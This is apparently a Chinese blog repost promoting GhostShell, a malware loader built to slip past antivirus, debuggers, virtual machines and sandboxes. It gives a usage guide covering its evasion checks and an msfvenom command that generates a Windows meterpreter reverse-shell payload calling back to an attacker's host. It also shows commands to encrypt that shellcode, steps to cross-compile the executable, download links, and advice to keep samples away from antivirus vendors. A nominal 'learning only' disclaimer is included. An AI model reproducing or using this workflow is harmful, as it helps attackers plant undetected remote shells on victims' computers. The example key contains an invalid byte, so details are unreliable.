GhostShell绕过杀毒软件检测bypass,反汇编

GhostShell绕过杀毒软件检测bypass,反汇编

GhostShell简介

在此恶意软件中,使用了一些技巧来绕过杀毒软件,虚拟机和沙盒,而仅需一点点学习即可投入使用.
仅可用于学习研究使用,我对您的滥用行为不承担任何责任.

注意

要检查防病毒软件是否检测到该恶意软件,切勿将其发送给病毒库,它将被发送给反病毒公司并被破坏,以进行分析并将其发送给https://www.hybrid-analysis.com/并记住选中“请勿将我的样品发送给非关联第三方”选项

Bypass技术

反调试器

为了绕过调试器,我使用“Windows.h”库中的“IsDebuggerPresent()”来检查调试器是否正在运行。

防虚拟机/防沙箱/防AV

  • 枚举过程函数 枚举系统上运行的所有进程,并与黑名单中的进程进行比较(如果找到了一个进程),并且该进程等于黑名单中的任何进程,则返回-1(标识)。
  • 睡眠加速检查功能 首先,获取当前时间,并休眠2分钟,然后,再次获取时间,然后进行比较,如果差异小于2,则返回-1(标识为)。
  • Mac地址检查功能 如果系统mac地址等于黑名单中的任何mac,则获取系统mac地址并与黑名单中的mac进行比较,返回-1(标识)。
GhostShell绕过杀毒软件检测bypass,反汇编
GhostShell绕过杀毒软件检测bypass,反汇编

 生成Shellcode

在终端中生成shellcode类型:

msfvenom -p windows/meterpreter/reverse_shell lhost=(IP) lport=(PORT) -f c

复制生成的shellcode并对其进行加密
要加密shellcode,请使用encrypt_shellcode脚本。

在linux上输入命令:

./encrypt_shellcode e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(shellcode)""

在Windows上输入命令:

encrypt_shellcode.exe e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(YOUR_SHELLCODE)""

如何在Linux上为Windows进行编译

#要在Linux上针对Windows进行编译,请先安装mingw-w64:
sudo apt-get install mingw-w64
#编译32位:
i686-w64-mingw32-gcc -o main.exe main.c -l psapi -static
#编译64位:
x86_64-w64-mingw32 -o main.exe main.c -l psapi -static

GhostShell下载地址

GitHub github.com/ReddyyZ/GhostShell
雨苁网盘 https://w.ddosi.workers.dev/

项目地址

GitHub https://github.com/ReddyyZ/GhostShell